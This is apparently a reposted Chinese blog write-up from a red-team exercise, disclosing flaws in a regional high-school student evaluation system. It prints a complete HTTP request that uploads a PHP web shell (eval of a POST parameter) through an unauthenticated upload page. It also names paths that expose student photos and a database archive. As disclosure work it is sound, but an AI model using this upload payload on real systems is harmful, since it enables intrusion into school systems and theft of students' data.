高中学生综合素质评价系统脆弱性
时间:2022-07-28
本文章向大家介绍高中学生综合素质评价系统脆弱性,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
0x00 前言
描述:在护网行动中遇到的一些教育行业系统漏洞总结;该系统大多在学校内网里面基本不向外界所以一般对于其很少爆出漏洞;
0x01 漏洞详细
(1) 任意文件上传
描述:在登录xxx市高中学生综合素质评价系统之后在个人资料处有一个上传头像,测试发现存在任意上传并成功利用取得shell;
通过对代码的分析发现并没有验证任何权限 /Website/MultiuploadFiles.php
(采用zend加密但是可以解密)
WeiyiGeek.
直接未登录访问:http://xxoo:8080/MultiuploadFiles.php / uploadimg.php
,然后上传一个图片用burp截包代码验证了 Content-Type
#POST请求
POST /MultiuploadFiles.php?action=act HTTP/1.1
Host: *.*.*.*:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://*.*.*.*:8080/MultiuploadFiles.php
Cookie: PHPSESSID=q7f4cjpdtpg97e9mn9diqi4p05
X-Forward-For: 127.0.0.1'
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------64873175618108
Content-Length: 818
-----------------------------64873175618108
Content-Disposition: form-data; name="afile"; filename="test.php"
Content-Type: image/jpeg
<?php echo(2333334-1);eval($_POST[0]);?>
-----------------------------64873175618108
Content-Disposition: form-data; name="button"
æ交
-----------------------------64873175618108--
目录遍历
描述: 目录遍历导致的照片泄漏的问题 http://xxoo.com/upload/
;
WeiyiGeek.
数据库下载
描述:http://xxoo.com/database/data.zip
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Java实现基本数据结构(二)——栈
- Java实现基本数据结构(一)——数组
- concurrently 实现前后端连载启动
- Vue+Koa2 前后端分离项目线上部署
- Nativefier— 将网站打包成桌面程序
- JAVA反射功能
- Git
- Bootstrap实用功能总结
- Bootstrap基础学习笔记
- 基于Paddle Lite在Android手机上实现图像分类
- redis学习笔记-set
- 图解一致性哈希算法,全网(小区局域网)最通俗易懂
- ES 创建索引时使用Dynamic Mapping动态映射 对字符串字段生成keyword字段
- Java 报错信息 Error during JavaScript execution
- 记录一次SpringBoot Autowired为null的错误